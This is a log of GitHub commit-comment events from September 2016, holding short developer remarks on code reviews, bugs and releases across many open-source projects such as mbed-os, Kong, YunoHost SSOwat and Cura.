{"id":"4554259563","type":"CommitCommentEvent","actor":{"login":"ohagendorf"},"repo":{"name":"ARMmbed/mbed-os"},"payload":{"comment":{"id":18997926,"position":8,"line":24,"path":"libraries/tests/mbed/can_loopback/main.cpp","commit_id":"d0e2f1efa6de02e1d522a025995d16f7b1de9edd","created_at":"2016-09-13T08:49:49Z","updated_at":"2016-09-13T08:49:49Z","body":"Please see PR #2682"}},"created_at":"2016-09-13T08:49:49Z"}
{"id":"4554259841","type":"CommitCommentEvent","actor":{"login":"zamentur"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18997927,"position":14,"line":51,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T08:49:52Z","updated_at":"2016-09-13T08:49:52Z","body":"It was from the lua-users wiki : http://lua-users.org/wiki/RandomStrings . But I think we could remove this and use, the salt generation from crypt."}},"created_at":"2016-09-13T08:49:52Z"}
{"id":"4554265778","type":"CommitCommentEvent","actor":{"login":"koola"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18997937,"position":null,"line":null,"path":null,"commit_id":"09d525deef8dca69bf2367b658aa84b8bf374785","created_at":"2016-09-13T08:51:07Z","updated_at":"2016-09-13T08:51:07Z","body":"I've added the auto resize feature in master and done some prep work you did here. Check it out!"}},"created_at":"2016-09-13T08:51:07Z"}
{"id":"4554274596","type":"CommitCommentEvent","actor":{"login":"wswebcreation"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18997960,"position":null,"line":null,"path":null,"commit_id":"09d525deef8dca69bf2367b658aa84b8bf374785","created_at":"2016-09-13T08:52:55Z","updated_at":"2016-09-13T08:52:55Z","body":"Tnx"}},"created_at":"2016-09-13T08:52:55Z"}
{"id":"4554282946","type":"CommitCommentEvent","actor":{"login":"Tieske"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":18997972,"position":31,"line":34,"path":"kong/cmd/start.lua","commit_id":"56c70e2b807e02b54e19cc29405d16cfda32e830","created_at":"2016-09-13T08:54:40Z","updated_at":"2016-09-13T08:54:40Z","body":"@thibaultcha just had to review this code in a merge conflict, nice fix, using `xpcall` :+1:"}},"created_at":"2016-09-13T08:54:40Z"}
{"id":"4554288196","type":"CommitCommentEvent","actor":{"login":"bangwu93"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18997988,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T08:55:46Z","updated_at":"2016-09-13T08:55:46Z","body":"Dear Vivian,\n\n \n\nIs the pulling to be done on SourceTree?\n\n \n\nRegards, Bangwu\n\n \n\nFrom: Low Bao Ling Vivian [mailto:notifications@github.com] \nSent: Tuesday, 13 September 2016 4:50 PM\nTo: sunset1215/rcs <rcs@noreply.github.com>\nCc: bangwu93 <bangwu.hong@hotmail.com>; Mention <mention@noreply.github.com>\nSubject: Re: [sunset1215/rcs] added testing file - bangwu.txt (904fc6a)\n\n \n\n@bangwu93 <https://github.com/bangwu93>  Thanks for rushing on this\n@kwonn <https://github.com/kwonn>  Nathan, please pull this latest commit. Once you do, we'll be set to proceed for LO-MergeConflicts. \n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/sunset1215/rcs/commit/904fc6aff546e28c14ed88cfb28f544d05690602#commitcomment-18997925> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AUNh-i2CkfISYz9hojifNilHGwkpvcIXks5qpmOngaJpZM4J7br3> .  <https://github.com/notifications/beacon/AUNh-h8RmKjNC5i0Pp4MHldqpvFZGBoZks5qpmOngaJpZM4J7br3.gif> \n\n"}},"created_at":"2016-09-13T08:55:46Z"}
{"id":"4554290197","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":18998010,"position":null,"line":null,"path":null,"commit_id":"207f09ddb797ebdff078b695b3c464f27a154dfa","created_at":"2016-09-13T08:56:11Z","updated_at":"2016-09-13T08:56:11Z","body":"@Blystad @mfonville sorry for contact you here .... but what do you think about this\r\n\r\nhttps://github.com/alviteri/all/commit/d4f7a650a2aeb9cba62b821a95f5189f14fc4367\r\nhttps://github.com/alviteri/aosp_build/commit/712232ce770996dd5db0ffc2a964434f24f09a0f"}},"created_at":"2016-09-13T08:56:11Z"}
{"id":"4554291371","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18998024,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-13T08:56:25Z","updated_at":"2016-09-13T08:56:25Z","body":"That is on `feature/lodash-v4`, this is `feature/eslint-reference`."}},"created_at":"2016-09-13T08:56:25Z"}
{"id":"4554292473","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18998028,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-13T08:56:38Z","updated_at":"2016-09-13T08:56:38Z","body":"Is there a utility to create swapfiles?\r\nA swap file creation utility could be careful to create a swapfile on only places that are sensible.\r\nMaybe here, it should simply use any swapfile that is found.\r\n\r\nSwapfiles can't work in pupmode=5, because no partitions are mounted, only swap partitions work."}},"created_at":"2016-09-13T08:56:38Z"}
{"id":"4554293340","type":"CommitCommentEvent","actor":{"login":"larsxschneider"},"repo":{"name":"Autodesk/cloudcomputecannon"},"payload":{"comment":{"id":18998030,"position":14,"line":14,"path":".travis.yml","commit_id":"3246f83601fe4325150b72c7c146ee69c5728630","created_at":"2016-09-13T08:56:49Z","updated_at":"2016-09-13T08:56:49Z","body":"you can avoid that by using relative submodule URLs.\r\ne.g. replace \r\n```url = git@github.com:rjanicek/janicek-core-haxe.git``` \r\nwith \r\n```url = ../../rjanicek/janicek-core-haxe.git```"}},"created_at":"2016-09-13T08:56:49Z"}
{"id":"4554294226","type":"CommitCommentEvent","actor":{"login":"w1061941849"},"repo":{"name":"bob143/trade"},"payload":{"comment":{"id":18998032,"position":null,"line":null,"path":null,"commit_id":"9d7eae4c25cc7954050b8b3c914431f4cb010868","created_at":"2016-09-13T08:57:00Z","updated_at":"2016-09-13T08:57:00Z","body":"w"}},"created_at":"2016-09-13T08:57:00Z"}
{"id":"4554297363","type":"CommitCommentEvent","actor":{"login":"michalkleiner"},"repo":{"name":"chrometoasters/silverstripe-gridfieldlimititems"},"payload":{"comment":{"id":18998041,"position":null,"line":null,"path":null,"commit_id":"479540712cd32131b030bb70f4cf2d57fcb72b55","created_at":"2016-09-13T08:57:39Z","updated_at":"2016-09-13T08:57:39Z","body":"Hi @patricknelson,\r\n\r\nyes, will move it into a separate branch and submit a PR ;-)\r\n\r\nCheers\r\nMichal"}},"created_at":"2016-09-13T08:57:39Z"}
{"id":"4554300899","type":"CommitCommentEvent","actor":{"login":"tuggygs"},"repo":{"name":"tuggygs/match-predictor"},"payload":{"comment":{"id":18998047,"position":null,"line":null,"path":null,"commit_id":"a5142f945829927287013473d3e202d3ac795930","created_at":"2016-09-13T08:58:22Z","updated_at":"2016-09-13T08:58:22Z","body":"13.09.2016"}},"created_at":"2016-09-13T08:58:22Z"}
{"id":"4554301440","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":18998049,"position":null,"line":null,"path":null,"commit_id":"207f09ddb797ebdff078b695b3c464f27a154dfa","created_at":"2016-09-13T08:58:28Z","updated_at":"2016-09-13T08:58:28Z","body":"![screenshot_20160913-105422](https://cloud.githubusercontent.com/assets/5174751/18467587/d841dfea-79a0-11e6-9947-f0c839850b66.png)\r\n![screenshot_20160913-105427](https://cloud.githubusercontent.com/assets/5174751/18467588/d845df82-79a0-11e6-8c95-f96ae550a7a4.png)\r\n![screenshot_20160913-105441](https://cloud.githubusercontent.com/assets/5174751/18467589/d84c78d8-79a0-11e6-8f45-020fb796e0d0.png)\r\n"}},"created_at":"2016-09-13T08:58:28Z"}
{"id":"4554302734","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18998052,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-13T08:58:45Z","updated_at":"2016-09-13T08:58:45Z","body":"Какие проблемы с cpusets в miui?"}},"created_at":"2016-09-13T08:58:45Z"}
{"id":"4554303605","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":18998053,"position":null,"line":null,"path":null,"commit_id":"207f09ddb797ebdff078b695b3c464f27a154dfa","created_at":"2016-09-13T08:58:56Z","updated_at":"2016-09-13T08:58:56Z","body":"@alviteri I will want to wait for the final release of the new Pixel devices before adding them to the packages and repo"}},"created_at":"2016-09-13T08:58:56Z"}
{"id":"4554303731","type":"CommitCommentEvent","actor":{"login":"sebix"},"repo":{"name":"Intevation/intelmq"},"payload":{"comment":{"id":18998054,"position":5,"line":140,"path":"intelmq/bots/experts/filter/expert.py","commit_id":"4abef1842af0a8a3712e8a4f6a84da55338ea27c","created_at":"2016-09-13T08:58:58Z","updated_at":"2016-09-13T08:58:58Z","body":"Why for the non-regex filter too?"}},"created_at":"2016-09-13T08:58:58Z"}
{"id":"4554308411","type":"CommitCommentEvent","actor":{"login":"dmblack"},"repo":{"name":"xme/misp-docker"},"payload":{"comment":{"id":18998064,"position":null,"line":null,"path":null,"commit_id":"c37cf2f6fabc1e8ee8b46f0fc788fb9c5b49e130","created_at":"2016-09-13T08:59:56Z","updated_at":"2016-09-13T08:59:56Z","body":"Thanks for addressing. Will confirm in the office tomorrow."}},"created_at":"2016-09-13T08:59:56Z"}
{"id":"4554308535","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18998065,"position":74,"line":601,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T08:59:57Z","updated_at":"2016-09-13T08:59:57Z","body":"@zamentur, combined with your idea of replacing this probably unsafe string.random implementation (which lacks a license also), this would ensure both ends use the same code AND the same source file. a lot better for maintainability"}},"created_at":"2016-09-13T08:59:57Z"}
{"id":"4554309700","type":"CommitCommentEvent","actor":{"login":"kwonn"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18998068,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T09:00:13Z","updated_at":"2016-09-13T09:00:13Z","body":"@sunset1215 I have pulled."}},"created_at":"2016-09-13T09:00:13Z"}
{"id":"4554312604","type":"CommitCommentEvent","actor":{"login":"GavinHao"},"repo":{"name":"ratiw/vue-table"},"payload":{"comment":{"id":18998077,"position":4,"line":12,"path":"src/components/Vuetable.vue","commit_id":"a40a44ef3a03a6ad8cf0b3271d6afa0f11b94377","created_at":"2016-09-13T09:00:47Z","updated_at":"2016-09-13T09:00:47Z","body":"here we got a bug, if we use the checkbox ,this  will get two th.  @ratiw "}},"created_at":"2016-09-13T09:00:47Z"}
{"id":"4554312634","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":18998078,"position":null,"line":null,"path":null,"commit_id":"207f09ddb797ebdff078b695b3c464f27a154dfa","created_at":"2016-09-13T09:00:47Z","updated_at":"2016-09-13T09:00:47Z","body":"@mfonville can I manitain the idea or need remove it? for future PR I mean"}},"created_at":"2016-09-13T09:00:47Z"}
{"id":"4554315441","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18998081,"position":4,"line":28,"path":"std/Math.hx","commit_id":"5b8bc7dd3dfb8999df8d86ccfdb9273dcc933d36","created_at":"2016-09-13T09:01:21Z","updated_at":"2016-09-13T09:01:21Z","body":"Not sure it's really pure, couldn't there be some crazy cases where order of execution of that function matters?\r\n\r\nSounds quite stupid tho, hmm..."}},"created_at":"2016-09-13T09:01:21Z"}
{"id":"4554321231","type":"CommitCommentEvent","actor":{"login":"zamentur"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18998088,"position":74,"line":601,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T09:02:29Z","updated_at":"2016-09-13T09:02:29Z","body":"Like explain on the bug tracker, it was difficult to find a sha512 lua implementation. So the other way is to build some lua/c library. But I am not sure to know how to do that with the debian package..."}},"created_at":"2016-09-13T09:02:29Z"}
{"id":"4554321384","type":"CommitCommentEvent","actor":{"login":"Geek-Lee"},"repo":{"name":"Geek-Lee/webapp"},"payload":{"comment":{"id":18998089,"position":null,"line":null,"path":null,"commit_id":"4725debbc24f40dd70646ef0fcb1c3f958129631","created_at":"2016-09-13T09:02:31Z","updated_at":"2016-09-13T09:02:31Z","body":"今天#收藏夹图标#这个是对的，但是收藏夹时显示的还是辣椒，在浏览器上栏显示的是头像，具体原因有待探索。\r\n#更改表格语言#更改了app/main/forms.py和app/auth/forms.py中的英文部分，测试时正确但是push到heroku时点击登录时要显示表格的时候错了(内部服务器错误，囧)，不知道怎么回事，反正就是表格更改时错误了。\r\n#回退form#又把两个form部分的汉语的部分翻译成英语了，编码声明无关紧要了，就没有改。"}},"created_at":"2016-09-13T09:02:31Z"}
{"id":"4554323089","type":"CommitCommentEvent","actor":{"login":"zamentur"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18998091,"position":14,"line":51,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T09:02:53Z","updated_at":"2016-09-13T09:02:53Z","body":"I push a new commit that remove this function."}},"created_at":"2016-09-13T09:02:53Z"}
{"id":"4554324300","type":"CommitCommentEvent","actor":{"login":"rcavalcanti"},"repo":{"name":"strongtyped/fun-cqrs"},"payload":{"comment":{"id":18998093,"position":55,"line":205,"path":"modules/akka/src/main/scala/io/funcqrs/akka/AggregateActor.scala","commit_id":"7dcc60f85b61a9e0cdf2ae709e7bf1105f938dca","created_at":"2016-09-13T09:03:07Z","updated_at":"2016-09-13T09:03:07Z","body":"You are totally right. For some reason I completely missed the fact that the persisting is async. Thanks for spotting that"}},"created_at":"2016-09-13T09:03:07Z"}
{"id":"4554326030","type":"CommitCommentEvent","actor":{"login":"robinandeer"},"repo":{"name":"guillermo-carrasco/guillermo-carrasco.github.com"},"payload":{"comment":{"id":18998097,"position":null,"line":null,"path":null,"commit_id":"71a02666cf1ba1613ddc1822d79caa20ffff90a7","created_at":"2016-09-13T09:03:27Z","updated_at":"2016-09-13T09:03:27Z","body":"#quickFix"}},"created_at":"2016-09-13T09:03:27Z"}
{"id":"4554327683","type":"CommitCommentEvent","actor":{"login":"rcavalcanti"},"repo":{"name":"strongtyped/fun-cqrs"},"payload":{"comment":{"id":18998104,"position":33,"line":67,"path":"modules/core/src/main/scala/io/funcqrs/interpreters/Interpreter.scala","commit_id":"7dcc60f85b61a9e0cdf2ae709e7bf1105f938dca","created_at":"2016-09-13T09:03:47Z","updated_at":"2016-09-13T09:03:47Z","body":"I've remove it already, but didn't push yet. Thanks"}},"created_at":"2016-09-13T09:03:47Z"}
{"id":"4554333984","type":"CommitCommentEvent","actor":{"login":"epknman"},"repo":{"name":"epknman/pdu-cc-cia"},"payload":{"comment":{"id":18998114,"position":null,"line":null,"path":null,"commit_id":"d293ff466edd8c9fbd136a9a0fa59af8a8b88260","created_at":"2016-09-13T09:04:56Z","updated_at":"2016-09-13T09:04:56Z","body":"hh"}},"created_at":"2016-09-13T09:04:56Z"}
{"id":"4554335612","type":"CommitCommentEvent","actor":{"login":"GavinHao"},"repo":{"name":"ratiw/vue-table"},"payload":{"comment":{"id":18998117,"position":4,"line":12,"path":"src/components/Vuetable.vue","commit_id":"a40a44ef3a03a6ad8cf0b3271d6afa0f11b94377","created_at":"2016-09-13T09:05:19Z","updated_at":"2016-09-13T09:05:19Z","body":"Here seems got bug, if we use checkbox, here will got two th.@ @ratiw "}},"created_at":"2016-09-13T09:05:19Z"}
{"id":"4554337018","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":18998122,"position":null,"line":null,"path":null,"commit_id":"207f09ddb797ebdff078b695b3c464f27a154dfa","created_at":"2016-09-13T09:05:35Z","updated_at":"2016-09-13T09:05:35Z","body":"You can maintain the idea."}},"created_at":"2016-09-13T09:05:35Z"}
{"id":"4554339503","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18998129,"position":14,"line":46,"path":"src/game/AI/GuardianAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T09:06:09Z","updated_at":"2016-09-13T09:06:09Z","body":"I dont follow you here. GuardianAI should be updated even more if is in combat. Or no action will be possible for it in that case."}},"created_at":"2016-09-13T09:06:09Z"}
{"id":"4554343333","type":"CommitCommentEvent","actor":{"login":"RSickenberg"},"repo":{"name":"RSickenberg/php_course"},"payload":{"comment":{"id":18998137,"position":4,"line":34,"path":"talk/admin/supprimer.php","commit_id":"1716caf7478ee18ce6579609443df6692a08730d","created_at":"2016-09-13T09:06:54Z","updated_at":"2016-09-13T09:06:54Z","body":"The button make the same action with history"}},"created_at":"2016-09-13T09:06:54Z"}
{"id":"4554344114","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":18998140,"position":null,"line":null,"path":null,"commit_id":"e3f1d508c2f0f712234d625d43531cd762f8902b","created_at":"2016-09-13T09:07:04Z","updated_at":"2016-09-13T09:07:04Z","body":"Previous release (3.7.0) is not working well without this code fragment. Please make a new release 3.7.1 ASAP, thx."}},"created_at":"2016-09-13T09:07:04Z"}
{"id":"4554344327","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18998141,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-13T09:07:08Z","updated_at":"2016-09-13T09:07:08Z","body":"[Here](https://github.com/mavrothal/Pox_git/blob/master/XO/XO_sfs/usr/sbin/mkswap-file.sh) is an old script I used in XOpup (the XO-1 had 256 MB RAM) and a little [daemon](https://github.com/mavrothal/Pox_git/blob/master/XO/XO_sfs/usr/local/bin/freeramdaemon) - by Mick - to check memory pressure"}},"created_at":"2016-09-13T09:07:08Z"}
{"id":"4554345198","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18998145,"position":20,"line":51,"path":"src/game/AI/GuardianAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T09:07:19Z","updated_at":"2016-09-13T09:07:19Z","body":"MINI_PET are not guardian so guardianAI should not be set for them at all. This check have to be done elsewere and not in update() function."}},"created_at":"2016-09-13T09:07:19Z"}
{"id":"4554346138","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":18998149,"position":null,"line":null,"path":null,"commit_id":"c394ae329d95544868145faad6def18c6ad4173a","created_at":"2016-09-13T09:07:30Z","updated_at":"2016-09-13T09:07:30Z","body":"'elapsed' takes only one 'l', can we fix it? ;)"}},"created_at":"2016-09-13T09:07:30Z"}
{"id":"4554346908","type":"CommitCommentEvent","actor":{"login":"vampire184"},"repo":{"name":"shoyu666/derocoodemo"},"payload":{"comment":{"id":18998155,"position":null,"line":null,"path":null,"commit_id":"e00bf5f0689014cb1b9a59ddfbe19d61dbd363c4","created_at":"2016-09-13T09:07:41Z","updated_at":"2016-09-13T09:07:41Z","body":"添加测试机型"}},"created_at":"2016-09-13T09:07:41Z"}
{"id":"4554352408","type":"CommitCommentEvent","actor":{"login":"wiewioraseb"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18998165,"position":null,"line":null,"path":null,"commit_id":"94e95a2bcb157657ce09e241386a0f526059ee0c","created_at":"2016-09-13T09:08:51Z","updated_at":"2016-09-13T09:08:51Z","body":"Unfortunately,  that did not help. For some reason, my hmr version is 1.0.1 instead of 1.2.1 as indicated in package.json. I even deleted the package and did npm install again.\r\n```\r\n+-- @angularclass/hmr@1.0.1 invalid  \r\n+-- @angularclass/hmr-loader@1.0.1 invalid\r\n```"}},"created_at":"2016-09-13T09:08:51Z"}
{"id":"4554355564","type":"CommitCommentEvent","actor":{"login":"SpeedyDanny"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":18998174,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-13T09:09:31Z","updated_at":"2016-09-13T09:09:31Z","body":"where is the codes for the server? (server 1 and 2) i want to check something on the sync server..."}},"created_at":"2016-09-13T09:09:31Z"}
{"id":"4554359970","type":"CommitCommentEvent","actor":{"login":"sinomiko"},"repo":{"name":"sinomiko/sunxiaobiu.github.io"},"payload":{"comment":{"id":18998186,"position":null,"line":null,"path":null,"commit_id":"93bb45bf662beb55cd8e5abd51a7e1b4fa7f3dfe","created_at":"2016-09-13T09:10:26Z","updated_at":"2016-09-13T09:10:26Z","body":"sorry for  inconvenience"}},"created_at":"2016-09-13T09:10:26Z"}
{"id":"4554361073","type":"CommitCommentEvent","actor":{"login":"jeanlf"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":18998188,"position":null,"line":null,"path":null,"commit_id":"c394ae329d95544868145faad6def18c6ad4173a","created_at":"2016-09-13T09:10:39Z","updated_at":"2016-09-13T09:10:39Z","body":"sure :)"}},"created_at":"2016-09-13T09:10:39Z"}
{"id":"4554363112","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"mdpradeep/julia"},"payload":{"comment":{"id":18998192,"position":null,"line":null,"path":null,"commit_id":"c718b5812b3d247a15b7953adc9874fb23b9c241","created_at":"2016-09-13T09:11:04Z","updated_at":"2016-09-13T09:11:04Z","body":"rebases are very strongly preferred over merge commits to avoid\r\n\r\n> Showing 96 changed files with 2,213 additions and 535 deletions."}},"created_at":"2016-09-13T09:11:04Z"}
{"id":"4554366810","type":"CommitCommentEvent","actor":{"login":"ProvidenceXz"},"repo":{"name":"jiaqimeng/Berkeley-SchedulePinner"},"payload":{"comment":{"id":18998204,"position":null,"line":null,"path":null,"commit_id":"36bd0e9df9e9a44f1c04e9c5b2d717bd27b42967","created_at":"2016-09-13T09:11:53Z","updated_at":"2016-09-13T09:11:53Z","body":"Took some time to figure out there's json written in the page :)\nOn Sep 13, 2016 1:33 AM, Cambridge <notifications@github.com> wrote::)\r\n\r\n—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-13T09:11:53Z"}
{"id":"4554368006","type":"CommitCommentEvent","actor":{"login":"vsn4ik"},"repo":{"name":"silviomoreto/bootstrap-select"},"payload":{"comment":{"id":18998205,"position":5,"line":1171,"path":"js/bootstrap-select.js","commit_id":"1cf4382b23cb632516c89413a5c50440c1a364e8","created_at":"2016-09-13T09:12:10Z","updated_at":"2016-09-13T09:12:10Z","body":"It's easier:\r\n```\r\nthis.$button.toggleClass('bs-placeholder', value === null || value.length === 0);\r\n```"}},"created_at":"2016-09-13T09:12:10Z"}
{"id":"4554368603","type":"CommitCommentEvent","actor":{"login":"vinyll"},"repo":{"name":"opendatateam/udata-id"},"payload":{"comment":{"id":18998208,"position":24,"line":24,"path":"udata_id/backends.py","commit_id":"cce5c782b3d1f42f0cdeffb07ce90daa3e787a59","created_at":"2016-09-13T09:12:17Z","updated_at":"2016-09-13T09:12:17Z","body":"fully agree. I was thinking of making a new PR for the remaining hardcoded _localhost_s but I might enrich this PR."}},"created_at":"2016-09-13T09:12:17Z"}
{"id":"4554375271","type":"CommitCommentEvent","actor":{"login":"infiSTAR"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18998223,"position":null,"line":null,"path":null,"commit_id":"a09e364ec12e9fb48dfa0b4dda217b77e9e04938","created_at":"2016-09-13T09:13:37Z","updated_at":"2016-09-13T09:13:37Z","body":"> Infistar blocks all damage from null sources in his damage handler and AFAIK it doesn't cause any major problems.\r\n\r\nI think that's a longer time ago, It was kind of not causing problems because of using exitWith within the eventhandler.. that for some reason isn't working well (the exitWith)\r\n\r\nproblem with explosions is, they can be all \"invisible\" to that handler - not showing Ammo or  source.  Maybe the best way is to work with Hit and HandleDamage all together?\r\n\r\nAlso explosions always trigger the handler at least twice 👍 "}},"created_at":"2016-09-13T09:13:37Z"}
{"id":"4554386234","type":"CommitCommentEvent","actor":{"login":"wilr"},"repo":{"name":"silvershop/silvershop-core"},"payload":{"comment":{"id":18998244,"position":null,"line":null,"path":null,"commit_id":"047bbdc7204556a9aa8f71de0efbc6723d75740f","created_at":"2016-09-13T09:15:57Z","updated_at":"2016-09-13T09:15:57Z","body":"All good! Happy for it to be reverted, I just couldn't see an easy way for a core module like subscriptions to rename the button without a making a whole lotta assumptions. Apart from that hadn't had many issues I couldn't do within core"}},"created_at":"2016-09-13T09:15:57Z"}
{"id":"4554392659","type":"CommitCommentEvent","actor":{"login":"andremiller"},"repo":{"name":"andremiller/Sous_Viduino"},"payload":{"comment":{"id":18998257,"position":null,"line":null,"path":null,"commit_id":"94878056ac5d89250f1e3bb9ee89b0cf1969463d","created_at":"2016-09-13T09:17:17Z","updated_at":"2016-09-13T09:17:17Z","body":"Fix for #1 "}},"created_at":"2016-09-13T09:17:17Z"}
{"id":"4554398167","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"dotnet/coreclr"},"payload":{"comment":{"id":18998264,"position":229,"line":259,"path":"src/mscorlib/src/System/Span.cs","commit_id":"d83919c752b74724cb952c55a98ddfef23e93956","created_at":"2016-09-13T09:18:20Z","updated_at":"2016-09-13T09:18:20Z","body":"I'm going to have to get used to this syntax"}},"created_at":"2016-09-13T09:18:20Z"}
{"id":"4554408971","type":"CommitCommentEvent","actor":{"login":"zamentur"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18998282,"position":74,"line":601,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T09:20:34Z","updated_at":"2016-09-13T09:20:34Z","body":"When you say \"use the same code\" you think the same code than yunohost cli ? \r\nI think we should not forget that ssowat can be used alone (without yunohost)"}},"created_at":"2016-09-13T09:20:34Z"}
{"id":"4554410161","type":"CommitCommentEvent","actor":{"login":"tschimbr"},"repo":{"name":"swissdrg/grouperserve"},"payload":{"comment":{"id":18998285,"position":113,"line":95,"path":"src/main/java/ch/eonum/grouperserve/GrouperServe.java","commit_id":"75d416e2cec2ce0b8339a50fbfb83b202849ad79","created_at":"2016-09-13T09:20:49Z","updated_at":"2016-09-13T09:20:49Z","body":"@HappyEmu : Is there any reason you do not use the annotate parameter in order to obtain diagnoses and procedures (in the patientCase object)? The idea is to keep the response small as long as we do not set annotate=true"}},"created_at":"2016-09-13T09:20:49Z"}
{"id":"4554410696","type":"CommitCommentEvent","actor":{"login":"pmeier82"},"repo":{"name":"TWOEARS/identification-training-pipeline"},"payload":{"comment":{"id":18998286,"position":28,"line":28,"path":"test/nSrcDetection.m","commit_id":"4ef22046a3bcfdd103d4839ff5f10c8646e93b08","created_at":"2016-09-13T09:20:55Z","updated_at":"2016-09-13T09:20:55Z","body":"I am currently writing the Start-Script and will incorporate your comments.\n\nBy two pipeline runs you mean one for training and one for testing correct?\n\n@BAC2 .. just had a look and see what you mean. It would only quantify the\naccuracy of the first class vs the others. Will have to write something\nhere for multiclass cases. Any suggestions here?\n\n--\nφιλ\n\nOn 12 September 2016 at 21:52, Ivo Trowitzsch <notifications@github.com>\nwrote:\n\n> When using more than one source, you have to split into two pipeline runs,\n> because now on source 2 and 3 you have files from the trainset ALWAYS, i.e.\n> also on the test set.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TWOEARS/identification-training-pipeline/commit/4ef22046a3bcfdd103d4839ff5f10c8646e93b08#commitcomment-18990519>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AASUquefW_QirMBEZHXHKEdTyAzTUvKyks5qpa1xgaJpZM4J69W0>\n> .\n>\n"}},"created_at":"2016-09-13T09:20:55Z"}
{"id":"4554411032","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18998287,"position":11,"line":57,"path":"resources/qml/MonitorButton.qml","commit_id":"31bc3d2575ac8caac4883d16fe3a6a7c9c4ae53b","created_at":"2016-09-13T09:21:00Z","updated_at":"2016-09-13T09:21:00Z","body":"In JS you could use switch/case, which looks a little bit better."}},"created_at":"2016-09-13T09:21:00Z"}
{"id":"4554413106","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":18998292,"position":null,"line":null,"path":null,"commit_id":"016cb7cd9bd20c1e48ae133939520776096f3902","created_at":"2016-09-13T09:21:25Z","updated_at":"2016-09-13T09:21:25Z","body":"After this commit my WOW hangs... waiting long time doesnt help. Some thing is wrong!"}},"created_at":"2016-09-13T09:21:25Z"}
